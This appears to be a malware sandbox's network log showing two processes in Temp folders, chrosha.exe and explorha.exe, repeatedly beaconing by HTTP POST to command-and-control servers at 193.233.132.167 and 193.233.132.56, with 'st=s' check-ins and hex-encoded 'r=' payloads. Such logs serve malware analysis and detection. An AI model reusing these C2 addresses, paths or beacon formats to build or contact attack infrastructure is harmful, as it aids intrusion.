                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:09.708194017 CEST  196                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
259         192.168.2.5  50100        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:31:09.496159077 CEST  309                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:09.750339031 CEST  196                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
260         192.168.2.5  50101        193.233.132.56   80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:31:10.070673943 CEST  158                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:10.316658020 CEST  219                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
261         192.168.2.5  50102        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:31:10.119183064 CEST  155                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:10.363306046 CEST  197                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
262         192.168.2.5  50104        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:31:10.614137888 CEST  309                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:10.866561890 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      263 | 192.168.2.5 | 50105 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:10.699224949 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:10.946702957 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      264 | 192.168.2.5 | 50106 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:11.193897963 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:11.440952063 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      265 | 192.168.2.5 | 50107 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:11.227988005 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:11.473793030 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      266 | 192.168.2.5 | 50108 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:11.725832939 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:11.979868889 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      267 | 192.168.2.5 | 50109 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:11.801348925 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:12.045923948 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      268 | 192.168.2.5 | 50110 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:12.298801899 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:12.551703930 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
269 | 192.168.2.5 | 50111 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:12.339152098 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:31:12.586751938 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
270 | 192.168.2.5 | 50112 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:12.836157084 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:13.086575985 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
271 | 192.168.2.5 | 50113 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:12.902077913 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:31:13.146429062 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
272 | 192.168.2.5 | 50114 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:13.399607897 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:13.652250051 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
273 | 192.168.2.5 | 50115 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:13.440234900 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:31:13.683067083 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
274 | 192.168.2.5 | 50116 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:13.932378054 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:14.183891058 CEST  196                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
275         192.168.2.5  50117        193.233.132.56   80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:31:14.005702972 CEST  158                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:14.244618893 CEST  219                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
276         192.168.2.5  50118        193.233.132.56   80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:31:14.497414112 CEST  312                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:14.748091936 CEST  196                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
277         192.168.2.5  50119        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:31:14.539510012 CEST  155                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:14.787008047 CEST  197                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
